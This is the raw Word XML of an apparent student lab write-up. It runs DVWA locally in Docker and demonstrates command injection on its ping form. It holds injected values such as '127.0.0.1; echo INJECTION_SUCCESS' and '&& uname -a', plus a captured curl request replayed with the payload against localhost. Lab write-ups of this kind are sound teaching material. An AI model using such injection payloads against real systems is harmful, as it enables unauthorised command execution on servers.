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C25" w:rsidRPr="00863C25" w:rsidRDefault="00863C25" w:rsidP="00863C25">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00863C25">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DVWA Website Login</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D54C85" w:rsidRPr="00863C25" w:rsidRDefault="00D54C85" w:rsidP="00D54C85">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00863C25">
        <w:t xml:space="preserve">Start DVWA locally using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00863C25">
        <w:t>Docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00863C25">
        <w:t xml:space="preserve"> and open the DVWA web UI.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D54C85" w:rsidRPr="00863C25" w:rsidRDefault="00D54C85" w:rsidP="00D54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package lists:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D54C85" w:rsidRPr="004C0257" w:rsidRDefault="00D54C85" w:rsidP="00D5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proofErr w:type="gram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apt update</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D54C85" w:rsidRPr="00863C25" w:rsidRDefault="00D54C85" w:rsidP="00D54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54C85" w:rsidRPr="004C0257" w:rsidRDefault="00D54C85" w:rsidP="00D5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proofErr w:type="gram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apt install -y docker.io</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D54C85" w:rsidRPr="00863C25" w:rsidRDefault="00D54C85" w:rsidP="00D54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&amp; start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daemon:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D54C85" w:rsidRPr="004C0257" w:rsidRDefault="00D54C85" w:rsidP="00D5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proofErr w:type="gram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systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spell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enable --now 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docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00D54C85" w:rsidRPr="00863C25" w:rsidRDefault="00D54C85" w:rsidP="00D54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 but recommended) Allow your user to run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54C85" w:rsidRPr="004C0257" w:rsidRDefault="00D54C85" w:rsidP="00D5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proofErr w:type="gram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usermod</w:t>
      </w:r>
      <w:proofErr w:type="spell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aG</w:t>
      </w:r>
      <w:proofErr w:type="spell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docker</w:t>
      </w:r>
      <w:proofErr w:type="spell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$USER</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D54C85" w:rsidRPr="00863C25" w:rsidRDefault="00D54C85" w:rsidP="00D54C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DVWA container (pulls image if needed):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D54C85" w:rsidRPr="004C0257" w:rsidRDefault="00D54C85" w:rsidP="00D5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proofErr w:type="gram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docker</w:t>
      </w:r>
      <w:proofErr w:type="spell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run --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rm</w:t>
      </w:r>
      <w:proofErr w:type="spell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-d --name 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dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spell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-p 8080:80 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vulnerables</w:t>
      </w:r>
      <w:proofErr w:type="spell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/web-</w:t>
      </w:r>
      <w:proofErr w:type="spell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dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00D54C85" w:rsidRPr="00863C25" w:rsidRDefault="00D54C85" w:rsidP="00D54C85">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00863C25">
        <w:t>Verify it’s running:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D54C85" w:rsidRPr="004C0257" w:rsidRDefault="00D54C85" w:rsidP="00D54C85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C0257">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004C025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0257">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/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4C025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0257">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="008972E7" w:rsidRPr="00863C25" w:rsidRDefault="008972E7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D54C85" w:rsidRPr="00863C25" w:rsidRDefault="00D54C85" w:rsidP="00D54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DVWA in the browser</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D54C85" w:rsidRPr="00863C25" w:rsidRDefault="00D54C85" w:rsidP="00D5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one of these URLs in the VM browser (use whichever works; /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index.php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root):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D54C85" w:rsidRPr="00863C25" w:rsidRDefault="00D54C85" w:rsidP="00D5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http://127.0.0.1:8080/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D54C85" w:rsidRPr="00863C25" w:rsidRDefault="00AE2EA0" w:rsidP="00D5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="00D54C85"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Create/Reset DB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D54C85" w:rsidRPr="00863C25" w:rsidRDefault="00D54C85" w:rsidP="00D5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credentials (DVWA):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D54C85" w:rsidRPr="00863C25" w:rsidRDefault="00D54C85" w:rsidP="00D54C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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D54C85" w:rsidRPr="00863C25" w:rsidRDefault="00D54C85" w:rsidP="00D54C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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D54C85" w:rsidRPr="00863C25" w:rsidRDefault="00D54C85" w:rsidP="00D5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login: </w:t>
      </w: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DVWA Security → set to LOW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demo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00015895" w:rsidRPr="00863C25" w:rsidRDefault="00015895" w:rsidP="00D5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5895" w:rsidRPr="00863C25" w:rsidRDefault="00015895" w:rsidP="00D5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2EA0" w:rsidRPr="00863C25" w:rsidRDefault="00AE2EA0" w:rsidP="00D5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3C25" w:rsidRDefault="00863C25" w:rsidP="0001589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5895" w:rsidRPr="00863C25" w:rsidRDefault="00015895" w:rsidP="0001589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3C25">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>COMMAND INJECTION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00015895" w:rsidRPr="00863C25" w:rsidRDefault="00015895">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00015895" w:rsidRPr="00863C25" w:rsidRDefault="00015895" w:rsidP="000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the DVWA Command Injection page</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00015895" w:rsidRPr="00863C25" w:rsidRDefault="00015895" w:rsidP="00AE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DVWA menu choose </w:t>
      </w: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Injection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5895" w:rsidRPr="00863C25" w:rsidRDefault="00015895" w:rsidP="000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— Baseline: confirm ping output (safe)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00015895" w:rsidRPr="00863C25" w:rsidRDefault="00015895" w:rsidP="000158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Command Injection input box enter:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00015895" w:rsidRPr="00863C25" w:rsidRDefault="00015895" w:rsidP="000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127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00015895" w:rsidRPr="00863C25" w:rsidRDefault="00015895" w:rsidP="000158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5895" w:rsidRDefault="00015895" w:rsidP="00AE2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 you should see ping output (ICMP replies) in the page — this proves the server executed ping &lt;your-input&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00863C25" w:rsidRPr="00863C25" w:rsidRDefault="00863C25" w:rsidP="00863C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972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895" w:rsidRPr="00863C25" w:rsidRDefault="00015895" w:rsidP="000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— Safe proof-of-concept injections (demonstrate control)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00015895" w:rsidRPr="00863C25" w:rsidRDefault="00015895" w:rsidP="000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one of these into the same input box and </w:t>
      </w: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15895" w:rsidRPr="00863C25" w:rsidRDefault="00015895" w:rsidP="000158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Echo marker </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00015895" w:rsidRDefault="00015895" w:rsidP="000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127.0.0.1; echo INJECTION_SUCCESS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C314F2" w:rsidRDefault="00C314F2" w:rsidP="00C314F2">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> runs the next command regardless of the previous exit status.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C314F2" w:rsidRDefault="00C314F2" w:rsidP="000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3C25" w:rsidRPr="00863C25" w:rsidRDefault="00863C25" w:rsidP="000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0323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895" w:rsidRPr="00863C25" w:rsidRDefault="00015895" w:rsidP="000158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system info </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA0003" w:rsidRDefault="00FA0003" w:rsidP="00FA0003">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA0003">
        <w:t xml:space="preserve">127.0.0.1 &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FA0003">
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FA0003">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA0003">
        <w:t>a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F05F24" w:rsidRDefault="00F05F24" w:rsidP="00FA0003">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> runs the next command only if the previous succeeded.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F05F24" w:rsidRDefault="00F05F24" w:rsidP="00F05F24">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>runs</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the next command only if the previous failed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F05F24" w:rsidRDefault="00F05F24" w:rsidP="000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3C25" w:rsidRPr="00863C25" w:rsidRDefault="00863C25" w:rsidP="000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40170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895" w:rsidRPr="00863C25" w:rsidRDefault="00015895" w:rsidP="000158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local ping </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00015895" w:rsidRDefault="00015895" w:rsidP="000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127.0.0.1; ping -c 2 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00863C25" w:rsidRPr="00863C25" w:rsidRDefault="00863C25" w:rsidP="000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51073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895" w:rsidRPr="00863C25" w:rsidRDefault="00015895" w:rsidP="000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5895" w:rsidRPr="00863C25" w:rsidRDefault="00015895" w:rsidP="000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 — Capture &amp; replay the request </w:t>
      </w:r>
      <w:r w:rsidR="00C314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 </w:t>
      </w:r>
      <w:r w:rsidR="0050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C314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DevTools</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C314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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C314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cURL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00500531" w:rsidRDefault="00015895" w:rsidP="000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show the request → server flow exactly </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00015895" w:rsidRPr="00FA0003" w:rsidRDefault="00015895" w:rsidP="000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A00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A. Capture the request</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00015895" w:rsidRPr="00863C25" w:rsidRDefault="00015895" w:rsidP="000158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EA0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open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Press </w:t>
      </w:r>
      <w:r w:rsidRPr="00863C2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Ctrl</w:t>
      </w:r>
      <w:r w:rsidRPr="00863C25">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r w:rsidRPr="00863C2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Shift</w:t>
      </w:r>
      <w:r w:rsidRPr="00863C25">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r w:rsidRPr="00863C2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I</w:t>
      </w:r>
      <w:r w:rsidRPr="00863C2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in the same window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63C25" w:rsidRPr="00863C25" w:rsidRDefault="00863C25" w:rsidP="00863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88673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etwork ta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79" cy="28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895" w:rsidRPr="00863C25" w:rsidRDefault="00015895" w:rsidP="000158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DVWA form once with 127.0.0.1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00015895" w:rsidRPr="00863C25" w:rsidRDefault="00015895" w:rsidP="000158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In Network list locate the request (likely POST /</w:t>
      </w:r>
      <w:r w:rsidR="00500531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vulnerabilities/exec/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15895" w:rsidRDefault="00015895" w:rsidP="000158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Copy → Copy as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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cURL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3C25" w:rsidRPr="00863C25" w:rsidRDefault="00863C25" w:rsidP="00863C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24560"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="11" name="Picture 11" descr="D:\Cyber Security\Screenshots\Screenshot from 2025-10-27 05-59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Cyber Security\Screenshots\Screenshot from 2025-10-27 05-59-4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A0" w:rsidRPr="004C0257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cURL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRP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code</w:t>
      </w:r>
      <w:r w:rsidR="004C0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curl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'http://127.0.0.1:8080/vulnerabilities/exec/#'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--compressed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-X POST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'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv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:128.0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) Gecko/20100101 Firefox/128.0'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-H 'Accept: text/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,application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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xhtml+xml,application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xml;q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=0.9,*/*;q=0.8'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'Accept-Language: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en-US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,en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;q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=0.5'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'Accept-Encoding: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gzip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deflate,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zstd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'Content-Type: application/x-www-form-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urlencoded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'Origin: http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/127.0.0.1:8080'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'Connection: keep-alive'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Referer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 http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/127.0.0.1:8080/vulnerabilities/exec/'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'Cookie: PHPSESSID=8q112t7gfq785uo1lhspas0tc6; security=low'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'Upgrade-Insecure-Requests: 1'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'Sec-Fetch-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Dest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 document'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'Sec-Fetch-Mode: navigate'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'Sec-Fetch-Site: same-origin'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'Sec-Fetch-User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 ?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1'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'Priority: u=0,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' \</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA0003" w:rsidRDefault="00FA0003" w:rsidP="000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003">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>--data-raw '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FA0003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FA0003">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>=127.0.0.1&amp;Submit=Submit'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00015895" w:rsidRPr="00FA0003" w:rsidRDefault="00015895" w:rsidP="000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A00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B. Modify &amp; replay</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00015895" w:rsidRPr="00863C25" w:rsidRDefault="00015895" w:rsidP="000158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copied curl into a terminal/editor.</w:t>
      </w:r>
      <w:r w:rsidR="0050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00531" w:rsidRPr="005005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(Above code)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00015895" w:rsidRPr="00863C25" w:rsidRDefault="00015895" w:rsidP="000158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POST data change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=127.0.0.1 →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=127.0.0.1; echo INJECTION_SUCCESS (keep cookies &amp; tokens unchanged).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00015895" w:rsidRPr="00863C25" w:rsidRDefault="00015895" w:rsidP="000158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modified curl:</w:t>
      </w:r>
      <w:r w:rsidR="00011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r w:rsidR="00011F14" w:rsidRPr="005005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(In Command Prompt)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/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curl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'http://127.0</w:t>
      </w:r>
      <w:r w:rsidR="004C0257">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>.0.1:8080/vulnerabilities/exec/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--compressed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-X POST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'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv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:128.0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) Gecko/20100101 Firefox/128.0'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'Accept: text/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,application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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xhtml+xml,application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xml;q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=0.9,*/*;q=0.8'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'Accept-Language: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en-US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,en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;q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=0.5'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-H 'Accept-Encoding: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gzip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deflate,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zstd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'Content-Type: application/x-www-form-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urlencoded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'Origin: http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/127.0.0.1:8080'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'Connection: keep-alive'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Referer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 http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/127.0.0.1:8080/vulnerabilities/exec/'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'Cookie: PHPSESSID=8q112t7gfq785uo1lhspas0tc6; security=low'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'Upgrade-Insecure-Requests: 1'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'Sec-Fetch-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Dest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 document'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'Sec-Fetch-Mode: navigate'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'Sec-Fetch-Site: same-origin'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'Sec-Fetch-User</w:t>
      </w:r>
      <w:proofErr w:type="gram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: ?</w:t>
      </w:r>
      <w:proofErr w:type="gram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1'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-H 'Priority: u=0,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' \</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE2EA0" w:rsidRPr="00863C25" w:rsidRDefault="00AE2EA0" w:rsidP="00AE2E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--data-raw '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=127.0.0.1; </w:t>
      </w:r>
      <w:r w:rsidRPr="00863C2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echo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INJECTION_SUCCESS</w:t>
      </w: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&amp;Submit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=Submit'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00015895" w:rsidRDefault="009B6BB0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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4. Inspect the terminal output — you’ll see the DVWA HTML that includes INJECTION_SUCCESS</w:t>
      </w:r>
      <w:r w:rsidRPr="00863C25">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00863C25" w:rsidRDefault="00863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39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url with modifications op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C25" w:rsidRPr="00863C25" w:rsidRDefault="00863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5099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p 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B7" w:rsidRPr="00863C25" w:rsidRDefault="00863C25" w:rsidP="0029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="00291BB7"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— Replay proof using your captured curl </w:t>
      </w:r>
      <w:r w:rsidR="00011F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spellStart"/>
      <w:r w:rsidR="00291BB7"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request→response</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00291BB7"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91BB7" w:rsidRPr="00011F14" w:rsidRDefault="00291BB7" w:rsidP="0029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Edit your copied curl; change only --data-raw:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00291BB7" w:rsidRPr="00011F14" w:rsidRDefault="00291BB7" w:rsidP="0029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Show marker in terminal (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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grep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00291BB7" w:rsidRPr="00863C25" w:rsidRDefault="00291BB7" w:rsidP="0029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&lt;the-curl-above&gt; 2&gt;/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/null |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-C2 INJECTION_SUCCESS || echo "marker not found"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00291BB7" w:rsidRPr="00011F14" w:rsidRDefault="00011F14" w:rsidP="0029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</w:t>
      </w:r>
      <w:r w:rsidR="00291BB7"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proves the request can be replayed outside the browser and returns the same injected output.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00863C25" w:rsidRPr="00863C25" w:rsidRDefault="00863C25" w:rsidP="0029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1494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ep 5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B7" w:rsidRPr="00863C25" w:rsidRDefault="00863C25" w:rsidP="0029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="00291BB7" w:rsidRPr="00863C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Forensic evidence in server logs (best for write-up)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00291BB7" w:rsidRPr="00863C25" w:rsidRDefault="00291BB7" w:rsidP="0029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Tail the Apache access log inside the container (host command):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00291BB7" w:rsidRPr="00011F14" w:rsidRDefault="00291BB7" w:rsidP="0029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proofErr w:type="gramEnd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docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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exec -it </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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lc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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'tail -n 120 /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00011F1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/log/apache2/access.log'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00291BB7" w:rsidRPr="00863C25" w:rsidRDefault="00291BB7" w:rsidP="0029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for the request/time that matches your test — you’ll see the request entry (timestamp, path). Optionally </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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863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vulnerabilities/exec or your session time.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00291BB7" w:rsidRPr="00863C25" w:rsidRDefault="00863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197" cy="4184073"/>
            <wp:effectExtent l="0" t="0" r="317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C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02" cy="41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BB7" w:rsidRPr="00863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15375"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D832A2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E10ED5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6CD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43DF6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A92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FA4C73"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="30F0AE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C979FA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6EF630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C4189A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1A7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884291"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E8B039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275911"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="70D2B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1811E2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="98C0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E40266"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7A9E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91312C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="280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1E74C5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F146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4DE2083"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ED5C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B31AD0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C782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3A5589"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4B32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31329E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="239A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7609C0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5CF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7424C5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B95C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51508E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="36AE2E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7"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="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32A"/>
    <w:rsid w:val="00011F14"/>
    <w:rsid w:val="00015895"/>
    <w:rsid w:val="00037F6F"/>
    <w:rsid w:val="001231F1"/>
    <w:rsid w:val="00291BB7"/>
    <w:rsid w:val="0034322B"/>
    <w:rsid w:val="004C0257"/>
    <w:rsid w:val="00500531"/>
    <w:rsid w:val="0084415D"/>
    <w:rsid w:val="00863C25"/>
    <w:rsid w:val="008972E7"/>
    <w:rsid w:val="009A632A"/>
    <w:rsid w:val="009B6BB0"/>
    <w:rsid w:val="00AE2EA0"/>
    <w:rsid w:val="00B05728"/>
    <w:rsid w:val="00C314F2"/>
    <w:rsid w:val="00D54C85"/>
    <w:rsid w:val="00F05F24"/>
    <w:rsid w:val="00FA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D619E2-92EA-4CE2-A4C3-D50D061C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4C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C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4C8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54C85"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-variable">
    <w:name w:val="hljs-variable"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D54C85"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-comment">
    <w:name w:val="hljs-comment"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D54C85"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00D54C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ljs-regexp">
    <w:name w:val="hljs-regexp"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D54C85"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-number">
    <w:name w:val="hljs-number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D54C85"/>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00D54C85"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
